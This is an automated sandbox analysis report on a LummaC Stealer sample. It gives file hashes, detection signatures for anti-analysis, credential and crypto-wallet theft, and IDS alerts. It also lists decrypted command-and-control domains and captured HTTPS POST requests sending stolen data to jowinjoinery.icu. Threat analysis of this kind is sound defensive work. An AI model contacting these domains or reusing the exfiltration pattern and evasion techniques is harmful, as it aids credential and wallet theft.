Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1634236
MD5: 5583d74a735a4c65191340fd7a465329
SHA1: b73bb428cc7c3f2e46400d69b619dd21584667cc
SHA256: 213df7a1f96111ae38d9c4b328acb71945f8f3e71a812be045af646abbe28885
Tags: exe, user-jstrosch

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 8384 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5583D74A735A4C65191340FD7A465329)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000003.1638752339.0000000000A17000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1638552100.00000000009FB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 8384 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 8384 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.ad0000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-10T21:04:46.737412+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:09.344558+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:12.261199+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:15.741968+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:18.783285+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:22.636182+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:28.038364+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 188.114.97.3 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: https://jowinjoinery.icu/bdWUa | Avira URL Cloud: Label: malware
Source: https://jowinjoinery.icu:443/bdWUa | Avira URL Cloud: Label: malware
Source: file.exe | ReversingLabs: Detection: 60%
Source: file.exe | Virustotal: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.file.exe.ad0000.0.unpack | String decryptor: jowinjoinery.icu/bdWUa
Source: 0.2.file.exe.ad0000.0.unpack | String decryptor: featureccus.shop/bdMAn
Source: 0.2.file.exe.ad0000.0.unpack | String decryptor: mrodularmall.top/aNzS
Source: 0.2.file.exe.ad0000.0.unpack | String decryptor: legenassedk.top/bdpWO
Source: 0.2.file.exe.ad0000.0.unpack | String decryptor: htardwarehu.icu/Sbdsa
Source: 0.2.file.exe.ad0000.0.unpack | String decryptor: cjlaspcorne.icu/DbIps
Source: 0.2.file.exe.ad0000.0.unpack | String decryptor: bugildbett.top/bAuz
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEB1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData | 0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEB55A CryptUnprotectData | 0_2_00AEB55A
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax] | 0_2_00B000B0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp word ptr [edi+ebx], 0000h | 0_2_00B1C1D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-25088CECh] | 0_2_00AE2124
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ebp, edx | 0_2_00B1C320
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h | 0_2_00AEA430
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00AFCBB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h] | 0_2_00AF0B40
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+10h] | 0_2_00AF0B40
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+esi-000000FEh] | 0_2_00B1D0C0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov dword ptr [esp+04h], eax | 0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [edx], cx | 0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h] | 0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov dword ptr [esp+04h], ecx | 0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h | 0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_00B073CB
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then lea eax, dword ptr [ecx-6C0B83CEh] | 0_2_00ADD780
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00AE1822
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h | 0_2_00B1D960
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx+14h] | 0_2_00ADDA3A
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+317AB538h] | 0_2_00ADDA3A
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h] | 0_2_00AEE0AC
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [eax], dx | 0_2_00AEE0AC
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-38B2FA5Ch] | 0_2_00B02120
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00B02120
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+12h] | 0_2_00ADC130
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov dword ptr [esp+04h], ecx | 0_2_00ADE174
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h] | 0_2_00AEE2C6
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h | 0_2_00B18240
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+08h] | 0_2_00B18240
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6C0B83D6h] | 0_2_00B18240
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 0_2_00ADA390
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_00ADA390
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 0_2_00AEA370
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_00B0836E
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+03h] | 0_2_00AF4430
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_00B0845D
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00B02540
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-52h] | 0_2_00B00670
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+2Ch] | 0_2_00B00650
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h] | 0_2_00AF2792
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 8D94E5DFh | 0_2_00B14750
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax] | 0_2_00B14750
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_00B10880
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movsx edx, byte ptr [ebx+ecx] | 0_2_00B1A88E
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h | 0_2_00B1C8C0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000B2h] | 0_2_00AE0994
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov dword ptr [esp], ebx | 0_2_00B069C1
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ebp, eax | 0_2_00AD8B20
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ecx | 0_2_00AEEB66
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h | 0_2_00B14B60
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 0_2_00AEEEFE
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h] | 0_2_00AEEEFE
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62h] | 0_2_00AE2F82
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h] | 0_2_00B190EF
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 0_2_00AF92A0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B12B9D2h] | 0_2_00AFF3C0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 0_2_00AFD32F
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov dword ptr [esp+04h], ecx | 0_2_00AED315
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+02h] | 0_2_00AE1368
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_00B074D1
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [edx], cx | 0_2_00AEB55A
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h] | 0_2_00AEB55A
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov dword ptr [esp+04h], ecx | 0_2_00AEB55A
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h | 0_2_00AEB55A
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah] | 0_2_00B1B680
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah] | 0_2_00B1B790
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp eax | 0_2_00ADF769
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah] | 0_2_00B1B9B0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h] | 0_2_00AED99F
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [eax], dx | 0_2_00AED99F
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah] | 0_2_00B1B900
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00AF9910
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-79B0712Ah] | 0_2_00AFDAA2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 0_2_00AFDAA2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 0_2_00AFDAA2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, edi | 0_2_00AF3A80
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah] | 0_2_00B1BA40
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+12EB444Ah] | 0_2_00ADFB20
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+5Dh] | 0_2_00ADDC9E
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: POST /bdWUa HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: jowinjoinery.icu
Source: global traffic | HTTP traffic detected: POST /bdWUa HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ClI3W3kzbX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 14881 | Host: jowinjoinery.icu
Source: global traffic | HTTP traffic detected: POST /bdWUa HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=T65RXqd8bKyh522r7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15065 | Host: jowinjoinery.icu
Source: global traffic | HTTP traffic detected: POST /bdWUa HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=M30gmTDPSn9qBw | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20539 | Host: jowinjoinery.icu
Source: global traffic | HTTP traffic detected: POST /bdWUa HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4pWBcto75KHZXU9Gzy | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2569 | Host: jowinjoinery.icu
Source: global traffic | HTTP traffic detected: POST /bdWUa HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2wCq2c1eu0zJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 569809 | Host: jowinjoinery.icu
Source: global traffic | HTTP traffic detected: POST /bdWUa HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 87 | Host: jowinjoinery.icu
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: jowinjoinery.icu
Source: unknown | HTTP traffic detected: POST /bdWUa HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: jowinjoinery.icu
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732071121.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732052923.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/D
Source: file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732071121.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732052923.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/Y
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731882460.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/bdWUa
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731882460.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/bdWUa5#Q
Source: file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/bdWUaY:
Source: file.exe, 00000000.00000003.1636635709.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/bdWUaq
Source: file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/bdWUas
Source: file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/bdWUate
Source: file.exe, 00000000.00000003.1676517185.0000000000A72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu/d
Source: file.exe, 00000000.00000003.1697028773.00000000009FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jowinjoinery.icu:443/bdWUa
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
